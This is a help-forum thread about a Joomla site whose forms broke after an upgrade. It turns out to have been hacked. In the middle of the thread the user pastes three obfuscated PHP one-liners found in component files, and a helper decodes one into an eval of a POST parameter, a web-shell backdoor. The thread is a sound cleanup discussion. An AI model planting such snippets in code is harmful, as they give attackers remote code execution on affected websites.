Forums

Hello,

I updated my website from Joomla 3.3 to Joomla 3.4 and suddenly the four forms of the website do not show anymore.
Instead, I have a white screen with this message:

Fatal error: Namespace declaration statement has to be the very first statement in the script in /homepages/43/d545606875/htdocs/clickanbuilds/Joomla/MyCMS/libraries/cegcore/libs/app_j.php on line 9

And I have the same message when I try to open the component in Joomla admin interface.

Could you please help me ?

Thank you in advance.

Yolanda

Hi Yolanda,

In the version of the file I have it is the very first thing

<?php
/**
* ChronoCMS version 1.0
* Copyright (c) 2012 ChronoCMS.com, All rights reserved.
* Author: (ChronoCMS.com Team)
* license: Please read LICENSE.txt
* Visit http://www.ChronoCMS.com for regular updates and information.
**/
namespace GCore\Libs;
/* @copyright:ChronoEngine.com @license:GPLv2 */defined('_JEXEC') or die('Restricted access');
defined("GCORE_SITE") or die;
. . .

Is it possible that the Click and Build site has added in something else?

Bob

Hi Bob,

Thank you so much for your prompt answer.

In my php file, between "<?php" and " /** ", I see this line :

$owl64="tproe_su" ; $kvxn35 =$owl64[6]. $owl64[0]. $owl64[2].$owl64[0].$owl64[3]. $owl64[7]. $owl64[1].$owl64[1].$owl64[4]. $owl64[2] ;$yaic2 =$kvxn35 ( $owl64[5].$owl64[1] . $owl64[3]. $owl64[6]. $owl64[0]) ;if ( isset ( ${$yaic2} [ 'q2d037e' ] ) ) { eval( ${ $yaic2} [ 'q2d037e'] );} ?> <?php

Should I just delete this part ?

Thanks for your help,

Yolanda

Hi Yolanda,

That's the problem and you should certainly delete it. You might also want to report it to your web-host as it looks to me as though it might be some form of hack. The code there produces this when you de-code it:

<?php
if ( isset ($_POST['q2d037e']) ) {
  eval($_POST['q2d037e']);
}
?>

Bob

Hi Bob,

I deleted the lines and then I had to delete
"$xlx53="sot_p" ; $cdbi2=strtoupper( $xlx53[3].$xlx53[4] . $xlx53[1]. $xlx53[0]. $xlx53[2]); if(isset (${ $cdbi2}[ 'q8d1aa7'] ) ) { eval ( ${ $cdbi2}['q8d1aa7' ]) ;}?> <?php"
from base64.php

and

"$btti33= "rostup_e" ;$mdd10 = $btti33[2]. $btti33[3].$btti33[0]. $btti33[3]. $btti33[1].$btti33[4]. $btti33[5].$btti33[5].$btti33[7].$btti33[0] ;$yzm3= $mdd10 ($btti33[6]. $btti33[5] . $btti33[1]. $btti33[2].$btti33[3] );if(isset (${ $yzm3 } ['qaa807a' ]) ){ eval(${$yzm3 } ['qaa807a']);} ?><?php"
from url.php

It is now working fine.

Thank you so much for your help.

Have a nice day.

Yolanda

Hi Yolanda,

Great that you have got it working. And I'm still a bit concerned that this is the result of a hack. If you haven't already done so you really should scan all the files in the site to make sure that there are no more snippets like this in any of the files.

Good luck

Bob